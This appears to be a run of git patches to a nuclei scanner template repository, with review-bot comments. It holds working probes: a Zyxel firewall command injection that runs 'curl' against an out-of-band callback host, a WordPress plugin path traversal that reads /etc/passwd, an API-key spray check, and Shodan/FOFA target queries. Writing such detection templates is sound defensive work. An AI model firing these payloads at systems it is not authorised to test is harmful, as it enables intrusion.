From 06f92ae1b9a83ba0b0d0be5aa04bfe35bfe1c1ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 30 Apr 2022 08:59:39 +0000 Subject: [PATCH 01/68] Auto Generated CVE annotations [Sat Apr 30 08:59:39 UTC 2022] :robot: --- cves/2022/CVE-2022-0591.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0591.yaml b/cves/2022/CVE-2022-0591.yaml index 22aef4aeef..63be423ad1 100644 --- a/cves/2022/CVE-2022-0591.yaml +++ b/cves/2022/CVE-2022-0591.yaml @@ -3,12 +3,17 @@ id: CVE-2022-0591 info: name: Formcraft3 < 3.8.28 - Unauthenticated SSRF author: Akincibor - severity: high + severity: critical description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users. reference: - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2022-0591 + cwe-id: CWE-918 requests: - method: GET From 92e9c1da0bc8ebc42bb24a32d7fccb22322a2be6 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 10 May 2022 13:22:31 +0900 Subject: [PATCH 02/68] Create gnuboard-sms-xss.yaml A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/gnuboard-sms-xss.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/gnuboard-sms-xss.yaml diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml new file mode 100644 index 0000000000..af7ea489c2 --- /dev/null +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml 
@@ -0,0 +1,32 @@ +id: gnuboard-sms-xss + +info: + name: Gnuboard CMS - SMS Emoticon XSS + author: gy741 + severity: medium + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. + reference: + - https://sir.kr/g5_pds/4788?page=5 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + tags: xss,gnuboard + +requests: + - method: GET + path: + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=nuclei" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header From 27a039a70cd3e6b299d648da4792f5035bc2e564 Mon Sep 17 00:00:00 2001 
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 12 May 2022 19:48:36 +0530 Subject: [PATCH 04/68] Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml --- cnvd/2021/CNVD-2021-15822.yaml | 4 ++++ cves/2010/CVE-2010-0219.yaml | 2 ++ cves/2020/CVE-2020-11978.yaml | 3 +++ cves/2020/CVE-2020-11991.yaml | 2 ++ cves/2020/CVE-2020-13927.yaml | 3 +++ cves/2021/CVE-2021-21402.yaml | 6 +++++- cves/2021/CVE-2021-38540.yaml | 1 + cves/2021/CVE-2021-44451.yaml | 3 +++ cves/2022/CVE-2022-24288.yaml | 3 ++- exposed-panels/adobe/adobe-component-login.yaml | 2 ++ exposures/files/cold-fusion-cfcache-map.yaml | 2 ++ miscellaneous/unpatched-coldfusion.yaml | 2 ++ misconfiguration/airflow/airflow-debug.yaml | 3 +++ technologies/apache/airflow-detect.yaml | 3 +++ technologies/apache/apache-axis-detect.yaml | 3 +++ technologies/apache/apache-cocoon-detect.yaml | 2 ++ technologies/jellyfin-detect.yaml | 3 +++ vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml | 2 ++ vulnerabilities/other/coldfusion-debug-xss.yaml | 2 ++ 
vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml | 3 +++ vulnerabilities/other/dedecms-openredirect.yaml | 3 +++ .../other/ecology-filedownload-directory-traversal.yaml | 2 ++ vulnerabilities/other/ecology-syncuserinfo-sqli.yaml | 2 ++ vulnerabilities/other/ecology-v8-sqli.yaml | 2 ++ vulnerabilities/other/natshell-path-traversal.yaml | 2 ++ vulnerabilities/other/tamronos-rce.yaml | 4 ++++ 26 files changed, 67 insertions(+), 2 deletions(-) diff --git a/cnvd/2021/CNVD-2021-15822.yaml b/cnvd/2021/CNVD-2021-15822.yaml index 3b7e2d8d1a..02ff83b22e 100644 --- a/cnvd/2021/CNVD-2021-15822.yaml +++ b/cnvd/2021/CNVD-2021-15822.yaml @@ -6,6 +6,10 @@ info: severity: high reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + metadata: + verified: true + shodan-query: title:"ShopXO企业级B2C电商系统提供商" + fofa-query: app="ShopXO企业级B2C电商系统提供商" tags: shopxo,lfi,cnvd,cnvd2021 requests: diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml index 6a9de7c6a1..271add009d 100644 --- a/cves/2010/CVE-2010-0219.yaml +++ b/cves/2010/CVE-2010-0219.yaml @@ -10,6 +10,8 @@ info: - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html classification: cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" tags: cve,cve2010,axis,apache,default-login,axis2 requests: diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index f441486273..133d10f1d7 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -16,6 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-77 + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" tags: cve,cve2020,apache,airflow,rce requests: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index b3849d5665..9269ec11d1 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml 
@@ -15,6 +15,8 @@ info: cve-id: CVE-2020-11991 cwe-id: CWE-611 remediation: Upgrade to Apache Cocoon 2.1.13 or later. + metadata: + shodan-query: http.html:"Apache Cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe requests: diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index d1445f9393..a7725bab88 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -14,6 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: cve,cve2020,apache,airflow,unauth requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index a920a2285e..4070ee9ee1 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -15,6 +15,10 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.html:"Jellyfin" + fofa-query: title="Jellyfin" || body="http://jellyfin.media" tags: cve,cve2021,jellyfin,lfi requests: @@ -34,4 +38,4 @@ requests: - type: regex regex: - "\\[(font|extension|file)s\\]" - part: body \ No newline at end of file + part: body diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml index 4d9d7ce135..8677ab8904 100644 --- a/cves/2021/CVE-2021-38540.yaml +++ b/cves/2021/CVE-2021-38540.yaml @@ -14,6 +14,7 @@ info: cve-id: CVE-2021-38540 cwe-id: CWE-306 metadata: + verified: true shodan-query: title:"Sign In - Airflow" tags: cve,cve2021,apache,airflow,rce diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml index 73771af543..6590c06d92 100644 --- a/cves/2021/CVE-2021-44451.yaml +++ b/cves/2021/CVE-2021-44451.yaml 
@@ -11,6 +11,9 @@ info: classification: cve-id: CVE-2021-44451 remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + metadata: + verified: true + shodan-query: title:"Superset" tags: cve,cve2021,apache,superset,default-login requests: diff --git a/cves/2022/CVE-2022-24288.yaml b/cves/2022/CVE-2022-24288.yaml index c064aa1d73..c42fd51b97 100644 --- a/cves/2022/CVE-2022-24288.yaml +++ b/cves/2022/CVE-2022-24288.yaml @@ -15,7 +15,8 @@ info: cve-id: CVE-2022-24288 cwe-id: CWE-78 metadata: - shodan-query: title:"Airflow - DAGs" + verified: true + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: cve,cve2022,airflow,rce requests: diff --git a/exposed-panels/adobe/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml index 9ef09b99d8..1d46e94118 100644 --- a/exposed-panels/adobe/adobe-component-login.yaml +++ b/exposed-panels/adobe/adobe-component-login.yaml @@ -9,6 +9,8 @@ info: - https://www.exploit-db.com/ghdb/6846 classification: cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: panel,adobe,coldfusion requests: diff --git a/exposures/files/cold-fusion-cfcache-map.yaml b/exposures/files/cold-fusion-cfcache-map.yaml index 1839ab4677..4a421602b6 100644 --- a/exposures/files/cold-fusion-cfcache-map.yaml +++ b/exposures/files/cold-fusion-cfcache-map.yaml @@ -6,6 +6,8 @@ info: severity: low reference: - https://securiteam.com/windowsntfocus/5bp081f0ac/ + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: exposure,coldfusion,adobe requests: diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml index 8d9c45d578..0c40b8b99c 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/miscellaneous/unpatched-coldfusion.yaml 
@@ -7,6 +7,8 @@ info: reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: rce,adobe,misc,coldfusion requests: diff --git a/misconfiguration/airflow/airflow-debug.yaml b/misconfiguration/airflow/airflow-debug.yaml index dc6f4a4a58..7e88c457d2 100644 --- a/misconfiguration/airflow/airflow-debug.yaml +++ b/misconfiguration/airflow/airflow-debug.yaml @@ -4,6 +4,9 @@ info: name: Airflow Debug Trace author: pdteam severity: low + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" tags: apache,airflow,fpd requests: diff --git a/technologies/apache/airflow-detect.yaml b/technologies/apache/airflow-detect.yaml index 5306691e5b..2d90657154 100644 --- a/technologies/apache/airflow-detect.yaml +++ b/technologies/apache/airflow-detect.yaml @@ -4,6 +4,9 @@ info: name: Apache Airflow author: pdteam severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" tags: tech,apache,airflow requests: diff --git a/technologies/apache/apache-axis-detect.yaml b/technologies/apache/apache-axis-detect.yaml index b5b574a7b5..6f4d1ee697 100644 --- a/technologies/apache/apache-axis-detect.yaml +++ b/technologies/apache/apache-axis-detect.yaml @@ -5,6 +5,9 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection + metadata: + verified: true + shodan-query: http.html:"Apache Axis" tags: tech,axis2,middleware,apache requests: diff --git a/technologies/apache/apache-cocoon-detect.yaml b/technologies/apache/apache-cocoon-detect.yaml index 36202e3229..d9155b9c2f 100644 --- a/technologies/apache/apache-cocoon-detect.yaml +++ b/technologies/apache/apache-cocoon-detect.yaml @@ -5,6 +5,8 @@ info: author: ffffffff0x severity: info metadata: + verified: true + shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" tags: apache,cocoon,tech 
diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index 9b31eaed43..226bdb95ce 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,9 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + metadata: + verified: true + shodan-query: http.html:"Jellyfin" tags: tech,jellyfin requests: diff --git a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml index f941cc707b..1b96e89056 100644 --- a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml +++ b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,upload,fileupload,intrusive requests: diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index ec093ae5c6..4de60288e2 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -7,6 +7,8 @@ info: description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index 41e0ebeeb0..72d4198957 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml 
@@ -7,6 +7,9 @@ info: description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: - https://www.cnblogs.com/milantgh/p/3615986.html + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms requests: diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index 08d6f16cb7..689d98efa2 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -6,6 +6,9 @@ info: severity: low reference: - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect requests: diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml index f063f98b29..61101d9fa7 100644 --- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml @@ -4,6 +4,8 @@ info: name: Ecology Directory Traversal author: princechaddha severity: medium + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,lfi requests: diff --git a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml index 81aecd13f1..7039f82f5c 100644 --- a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml +++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://www.weaver.com.cn/ + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,sqli requests: diff --git a/vulnerabilities/other/ecology-v8-sqli.yaml b/vulnerabilities/other/ecology-v8-sqli.yaml index 4b23314522..5279e14a6f 100644 --- a/vulnerabilities/other/ecology-v8-sqli.yaml 
+++ b/vulnerabilities/other/ecology-v8-sqli.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,sqli requests: diff --git a/vulnerabilities/other/natshell-path-traversal.yaml b/vulnerabilities/other/natshell-path-traversal.yaml index f0e47959f9..629dd6eec9 100644 --- a/vulnerabilities/other/natshell-path-traversal.yaml +++ b/vulnerabilities/other/natshell-path-traversal.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + metadata: + fofa-query: title="蓝海卓越计费管理系统" tags: natshell,lfi requests: diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml index 417bbba2a3..2b473e957c 100644 --- a/vulnerabilities/other/tamronos-rce.yaml +++ b/vulnerabilities/other/tamronos-rce.yaml @@ -6,6 +6,10 @@ info: severity: critical reference: - https://twitter.com/sec715/status/1405336456923471874 + metadata: + verified: true + shodan-query: title:"TamronOS IPTV系统" + fofa-query: title="TamronOS IPTV系统" tags: tamronos,rce requests: From c616179c95855901bd5d6baec5b9d42302f84b50 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 01:11:32 +0530 Subject: [PATCH 06/68] Update gnuboard-sms-xss.yaml --- vulnerabilities/other/gnuboard-sms-xss.yaml | 25 ++++++++++++--------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml index af7ea489c2..155dea7f7d 100644 --- a/vulnerabilities/other/gnuboard-sms-xss.yaml +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml 
@@ -8,25 +8,28 @@ info: reference: - https://sir.kr/g5_pds/4788?page=5 - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + metadata: + verified: true + shodan-query: http.html:"Gnuboard" tags: xss,gnuboard requests: - method: GET path: - - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=nuclei" + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard" matchers-condition: and matchers: + - type: word + part: body + words: + - '"0nuboard"' + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header From 6b403b30bfb082797c8749491226223f212a9703 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 May 2022 19:45:17 +0000 Subject: [PATCH 07/68] Auto Generated New Template Addition List [Thu May 12 19:45:16 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b94ac64882..545a2d5f02 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ technologies/dedecms-detect.yaml technologies/ecology-detect.yaml technologies/jspxcms-detect.yaml vulnerabilities/other/ecsimagingpacs-rce.yaml +vulnerabilities/other/gnuboard-sms-xss.yaml vulnerabilities/wordpress/age-gate-open-redirect.yaml vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml vulnerabilities/wordpress/wp-security-open-redirect.yaml From a22df99866b761bd4a9b1304c5cd087ef3de3f11 Mon Sep 17 00:00:00 2001 From: Dominik Opyd Date: Thu, 12 May 2022 23:01:08 +0200 Subject: [PATCH 08/68] feat(token-spray): moonpay api test (#4380) * feat(token-spray): moonpay api test * refactor: pascal case name --- token-spray/api-moonpay.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 token-spray/api-moonpay.yaml 
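Review bot: In `gnuboard-sms-xss.yaml` the new body matcher expects `"0nuboard"` while the request sends `arr_ajax_msg=gnuboard`, and nothing in the template explains why the first character differs. Presumably the endpoint overwrites the first character of the supplied value before echoing it, but that is inferred and should be confirmed by the author. A comment above the matcher would help the next maintainer, for example `# arr_ajax_msg=gnuboard is echoed back as "0nuboard" in a text/html response, showing the value reaches the output`. Without it the marker looks like a typo and is likely to be "corrected" in a later edit, which would silently break the detection.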
diff --git a/token-spray/api-moonpay.yaml b/token-spray/api-moonpay.yaml new file mode 100644 index 0000000000..a7ec6a7d0d --- /dev/null +++ b/token-spray/api-moonpay.yaml @@ -0,0 +1,22 @@ +id: api-moonpay + +info: + name: MoonPay API Test + author: 0ri2N + severity: info + reference: + - https://dashboard.moonpay.com/getting_started + tags: token-spray,moonpay,cryptocurrencies + +self-contained: true +requests: + - method: GET + path: + - "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1" + + matchers: + - type: word + part: body + words: + - '"accountId":' + condition: and From 5100b5c3fa169c5169bd0b75924468e30d84c180 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 May 2022 21:01:30 +0000 Subject: [PATCH 09/68] Auto Generated New Template Addition List [Thu May 12 21:01:30 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 545a2d5f02..c49766a07d 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ technologies/cloudflare-nginx-detect.yaml technologies/dedecms-detect.yaml technologies/ecology-detect.yaml technologies/jspxcms-detect.yaml +token-spray/api-moonpay.yaml vulnerabilities/other/ecsimagingpacs-rce.yaml vulnerabilities/other/gnuboard-sms-xss.yaml vulnerabilities/wordpress/age-gate-open-redirect.yaml From 3e4e2d4a5c78ff829539091f5ff484082824c3cf Mon Sep 17 00:00:00 2001 From: h1ei1 <62200676+h1ei1@users.noreply.github.com> Date: Fri, 13 May 2022 10:52:42 +0800 Subject: [PATCH 10/68] Create CVE-2022-30525.yaml --- cves/2022/CVE-2022-30525.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2022/CVE-2022-30525.yaml diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml new file mode 100644 index 0000000000..9c9d520a17 --- /dev/null +++ b/cves/2022/CVE-2022-30525.yaml 
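Review bot: In `api-moonpay.yaml` the only matcher is a body word check for `"accountId":`, so any response that contains that key counts as a valid token whatever the status code. Adding a `status` matcher for 200 under `matchers-condition: and` would tighten the result, assuming a valid key returns 200. `condition: and` on a one-entry `words` list has no effect and can be dropped. The token is sent as the `apiKey` query parameter, so it will show up in proxy and request logs on the scanning side; a short comment saying so would help users who test live keys.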
@@ -0,0 +1,25 @@ +id: CVE-2022-30525 + +info: + name: Zyxel Firewall Unauthenticated RCE + author: h1ei1 + severity: critical + description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on . + reference: + - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + tags: rce,Zyxel,cve,cve2022 + +requests: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"} + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From b3a755e2a049c531e1d606182041cb70498cd0fc Mon Sep 17 00:00:00 2001 From: Veshraj Ghimire <54109630+V35HR4J@users.noreply.github.com> Date: Fri, 13 May 2022 09:33:08 +0545 Subject: [PATCH 11/68] Create CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2022/CVE-2022-1392.yaml diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml new file mode 100644 index 0000000000..4294d5f8a4 --- /dev/null +++ b/cves/2022/CVE-2022-1392.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2022-1392 + +info: + name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI + author: Veshraj + severity: high + description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + tags: lfi,wp-plugin,cve,cve2022 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 891e6e48e9dd6d9fd0a50c46acb8cbb5c30b707b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 14:16:09 +0530 Subject: [PATCH 12/68] Update CVE-2022-30525.yaml --- cves/2022/CVE-2022-30525.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml index 9c9d520a17..359020a92e 100644 --- a/cves/2022/CVE-2022-30525.yaml +++ b/cves/2022/CVE-2022-30525.yaml 
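Review bot: The `tags` line in `CVE-2022-1392.yaml` omits `wp`, `wordpress` and `unauth`, which the other WordPress plugin template in this series (CVE-2022-0591) carries, so a scan selected by those tags would skip this check. `tags: lfi,wp,wp-plugin,wordpress,cve,cve2022,unauth` would bring it in line, and the template name already says the issue is unauthenticated. The `regex` matcher also gives no `part`, whereas the other templates in this series write `part: body` explicitly; adding it is a consistency fix only.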
@@ -1,13 +1,16 @@ id: CVE-2022-30525 info: - name: Zyxel Firewall Unauthenticated RCE - author: h1ei1 + name: Zyxel Firewall - Unauthenticated RCE + author: h1ei1,prajiteshsingh severity: critical - description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on . + description: | + The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on. reference: - - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - tags: rce,Zyxel,cve,cve2022 + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + tags: rce,zyxel,cve,cve2022,firewall,unauth requests: - raw: @@ -16,10 +19,15 @@ requests: Host: {{Hostname}} Content-Type: application/json - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"} + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500 From 2fe79ed9a90d28d4e5f2b636ae9fb16e43b03565 Mon Sep 17 00:00:00 2001 
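Review bot: The rewritten `description` in the first hunk of `CVE-2022-30525.yaml` still ends in the broken fragment "to target the affected device as nobody Execute arbitrary code as a user on.", so the finding text an analyst reads does not state the impact. A wording such as `allowing an unauthenticated remote attacker to execute arbitrary code as the nobody user on the affected device.` appears to be what is meant, but it should be checked against the advisory linked under `reference`. The `info` block also has no `classification` entry with `cve-id`, unlike the CVE-2022-0591 and CVE-2022-1392 templates in this series.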
